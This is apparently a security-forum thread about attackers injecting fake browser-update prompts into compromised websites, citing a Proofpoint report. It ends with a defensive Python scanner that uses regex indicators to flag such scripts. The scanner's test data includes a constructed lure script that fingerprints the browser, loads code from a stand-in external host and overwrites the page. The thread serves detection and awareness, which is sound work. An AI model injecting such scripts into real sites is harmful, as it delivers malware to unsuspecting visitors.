Watch Out: Attackers Are Hiding Malware in 'Browser Updates'

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,176
Updating your browser when prompted is a good practice, just make sure the notification comes from the vendor themselves.

Threat actors are using cybersecurity best practices against you, hiding malware inside of fake browser updates. They do so by seeding legitimate but vulnerable websites with malicious JavaScript. Upon loading, the code presents users with convincing browser update notifications, masking dangerous payloads.

According to an Oct. 17 report from Proofpoint, the trend began with one threat actor, TA569, and it has since been adopted by at least four different threat clusters, in what appears to be a growing and intractable new trend.

"TA569 has been very active for quite some time, and I've seen how difficult it has been for customers to understand and remediate the threat on their own," says Daniel Blackford, senior manager of threat research at Proofpoint. Because it's so effective, he adds, "other threat actors have absolutely piggybacked on it."

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,176
In Linux the browser is updated from the official repositories through the package manager, and never through the browser itself.
Probably the same advantage applies to Windows users who install browsers only from the Microsoft Store; the major browsers are available there.

Ink

Administrator
Verified
Staff Member
Well-known
Jan 8, 2011
22,361

The Current Landscape of Fake Browser Updates


Key Takeaways
  • Proofpoint is tracking multiple different threat clusters that use similar themes related to fake browser updates.
  • Fake browser updates abuse end user trust with compromised websites and a lure customized to the user's browser to legitimize the update and fool users into clicking.
  • Threat actors do not send emails to share the compromised websites. The threat is only in the browser and can be initiated by a click from a legitimate and expected email, social media site, search engine query, or even just navigating to the compromised site.
  • The different campaigns use similar lures, but different payloads. It is important to identify which campaign and malware cluster the threat belongs to, to help guide defender response.

The fake browser update lures are effective because threat actors are using an end user's security training against them. In security awareness training, users are told to only accept updates or click on links from known and trusted sites or individuals, and to verify that sites are legitimate. The fake browser updates abuse this training because they compromise trusted sites and use JavaScript requests to quietly make checks in the background and overwrite the existing website with a browser update lure. To an end user, it still appears to be the same website they were intending to visit, and it is now asking them to update their browser.

Remember that all modern browsers update silently in the background.
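The post describes the injected script's defining behaviour: it fingerprints the visitor's browser, then replaces the page the user asked for with an update prompt, often pulling its payload from a third-party host. The following scanner is an added example written for this thread (it is not from Proofpoint's report or any product) that a site owner can run over their own page source to triage inline scripts for that combination. The indicator regexes, the scoring weights, the "suspicious" threshold, the sample pages and the host `cdn.example-lure.invalid` are all constructed for illustration.

```python
"""Heuristic triage of inline <script> blocks for fake-browser-update lures.

Added example for this thread, not code from the article or from Proofpoint.
It flags scripts that combine a user-agent check with overwriting the page
body, plus update-themed wording, light obfuscation and third-party loads.
Constructed sample pages are included so it runs offline.
"""
import re
from dataclasses import dataclass, field

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
# Captures the host of any `x.src = "https://host/..."` assignment inside a script.
EXTERNAL_SRC_RE = re.compile(r"""\.src\s*=\s*['"]https?://([^/'"]+)""", re.IGNORECASE)

# Indicator names and patterns are an assumption chosen for this example.
INDICATORS = {
    "ua_check": re.compile(r"navigator\.(?:userAgent|vendor|platform)", re.I),
    "body_overwrite": re.compile(
        r"document\.(?:body|documentElement)\.innerHTML\s*=|document\.write\s*\(", re.I),
    "update_lure": re.compile(
        r"(?:browser|chrome|firefox|edge|safari)\s+(?:update|is out of date)"
        r"|update\s+(?:required|needed|available|now)", re.I),
    "obfuscation": re.compile(r"\batob\s*\(|String\.fromCharCode|\bunescape\s*\(", re.I),
}


@dataclass
class Finding:
    index: int                      # position of the script block in the page
    hits: list = field(default_factory=list)
    external_hosts: list = field(default_factory=list)
    score: int = 0
    suspicious: bool = False


def extract_scripts(html):
    """Return the bodies of all inline <script> blocks, in document order."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)]


def analyse_script(index, body, first_party):
    """Score one script body; first_party is the site's own host name."""
    f = Finding(index=index)
    for name, rx in INDICATORS.items():
        if rx.search(body):
            f.hits.append(name)
    for host in EXTERNAL_SRC_RE.findall(body):
        host = host.lower().split(":")[0]
        if host != first_party and not host.endswith("." + first_party):
            f.external_hosts.append(host)
    # One point per indicator, one more if the script loads from elsewhere.
    f.score = len(f.hits) + (1 if f.external_hosts else 0)
    # The combination the post describes (fingerprint, then replace the page)
    # is flagged on its own; otherwise three or more signals are needed.
    f.suspicious = ("ua_check" in f.hits and "body_overwrite" in f.hits) or f.score >= 3
    return f


def scan_html(html, first_party):
    return [analyse_script(i, s, first_party.lower()) for i, s in enumerate(extract_scripts(html))]


def suspicious_scripts(html, first_party):
    return [f for f in scan_html(html, first_party) if f.suspicious]


# Constructed sample: the legitimate page with an ordinary analytics snippet.
CLEAN_PAGE = """<html><head>
<script>
  // first-party analytics: records the UA but never rewrites the page
  var ua = navigator.userAgent;
  fetch('/stats?ua=' + encodeURIComponent(ua));
</script>
</head><body><h1>Example Shop</h1></body></html>"""

# Constructed sample: the same page with a lure script appended before </body>.
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<script>
  (function () {
    var ua = navigator.userAgent;
    var b = /Chrome/.test(ua) ? 'Chrome' : /Firefox/.test(ua) ? 'Firefox' : 'browser';
    var s = document.createElement('script');
    s.src = 'https://cdn.example-lure.invalid/loader.js';
    document.head.appendChild(s);
    document.body.innerHTML = atob('PGgxPg==') + 'Your ' + b + ' update required' + '</h1>';
  })();
</script></body>""")

if __name__ == "__main__":
    for page_name, page in [("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)]:
        for f in scan_html(page, "example.com"):
            print(page_name, f.index, f.score, f.suspicious, f.hits, f.external_hosts)
```

The analytics snippet scores one point (it reads the user agent) and is left alone; the injected block trips every indicator and names a host outside the site, so it is reported with its index in the page for manual review. Real injections are usually more obfuscated than this sample, so the scanner is a triage aid for a site owner comparing the served page against the source they deployed, not a replacement for that comparison.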
